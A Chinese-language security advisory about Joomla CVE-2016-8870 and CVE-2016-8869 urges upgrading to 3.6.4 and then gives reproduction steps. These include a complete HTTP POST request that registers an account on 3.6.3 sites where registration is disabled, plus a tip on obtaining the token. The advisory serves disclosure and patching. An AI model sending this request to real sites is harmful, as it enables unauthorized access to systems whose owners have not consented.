频道栏目
首页 > 资讯 > 安全公告 > 正文

Joomla安全漏洞不容忽视,请及时更新修复

16-10-29        来源:[db:作者]  
收藏   我要投稿

 

漏洞描述

账号创建(Account Creation)

影响版本:3.4.4到3.6.3

报告日期:2016年10月18号

修复日期:2016年10月25号

CVE编号:CVE-2016-8870

描述:不严格的检查允许用户在网站不允许注册的时候注册账号

修复建议:升级到Joomla!3.6.4版本

权限提升(Elevated Privileges)

影响版本:3.4.4到3.6.3

报告日期:2016年10月18号

修复日期:2016年10月25号

CVE编号:CVE-2016-8869

描述:不恰当的使用未经严格的数据导致已注册账号可以提升权限

修复建议:升级到Joomla!3.6.4版本

安全客表示将持续关注该漏洞并及时跟进最新信息。

25号Joomla!官方公告

Joomla! 3.6.4现在已经可以下载了。这是一个3.x版本的安全更新。修复了2个关键的安全问题和一个双因子认证的bug。我们强烈的建议你里立即更新你的网站。

21号Joomla!官方公告

在10月25号14:00 UTC(北京时间约22:00)即将发布Joomla! 3.6.4版本(包含一个重要安全问题的修复),Joomla!的Strike Team安全团队(JSST)确认了这个安全问题。

这是一个非常重要的安全问题修复,请在下周二准备好去更新你的Joomla!。

请理解我们,直到这个版本发布之前,我们不会透漏关于这个漏洞的任何信息。

账号创建(Account Creation)复现过程

下载受漏洞影响版本3.6.3并部署,关闭用户注册模块。下载地址

https://github.com/joomla/joomla-cms/releases/download/3.6.3/Joomla_3.6.3-Stable-Full_Package.tar.gz

查看官方修复后的版本3.6.4改动后的代码

https://github.com/joomla/joomla-cms/commit/bae1d43938c878480cfd73671e4945211538fdcf

我们发现components/com_users/controllers/user.php文件中,删除了大量的代码

根据删掉代码里的逻辑,这里并没有检测用户能否注册的权限,我们提交下面的POST请求,即可完成未授权注册用户。

 

 

为方便大家复现,参考数据包如下

POST /index.php?option=com_users&task=user.register HTTP/1.1

Host: localhost

Referer: localhost/index.php/component/users/?view=registration

Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydPTUbyuhuekYdsD4

Cookie: 16ff61c719338342d4ec65bab8753e6f=g513vf2aandq0dn8fjtcreu523

Connection: close

Content-Length: 1032

------WebKitFormBoundarydPTUbyuhuekYdsD4

Content-Disposition: form-data; name="user[name]"

secknight

------WebKitFormBoundarydPTUbyuhuekYdsD4

Content-Disposition: form-data; name="user[username]"

secknight

------WebKitFormBoundarydPTUbyuhuekYdsD4

Content-Disposition: form-data; name="user[password1]"

password

------WebKitFormBoundarydPTUbyuhuekYdsD4

Content-Disposition: form-data; name="user[password2]"

password

------WebKitFormBoundarydPTUbyuhuekYdsD4

Content-Disposition: form-data; name="user[email1]"

email@test.com

------WebKitFormBoundarydPTUbyuhuekYdsD4

Content-Disposition: form-data; name="user[email2]"

email@test.com

------WebKitFormBoundarydPTUbyuhuekYdsD4

Content-Disposition: form-data; name="option"

com_users

------WebKitFormBoundarydPTUbyuhuekYdsD4

Content-Disposition: form-data; name="task"

user.register

------WebKitFormBoundarydPTUbyuhuekYdsD4

Content-Disposition: form-data; name="671f11e3d1d883f57f8b30e2a2359523"

------WebKitFormBoundarydPTUbyuhuekYdsD4--

这里需要注意需要token安全验证,token可以通过index页面的login处获取。

 

 

登陆管理员后台查看用户信息,发现新用户secknight,请注意权限。

 

 

前台登陆测试。

 

相关TAG标签
上一篇:minerd木马攻击处理(1)
下一篇:“红遍全球”的恶意软件Mirai,你所需要知道的那些事
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站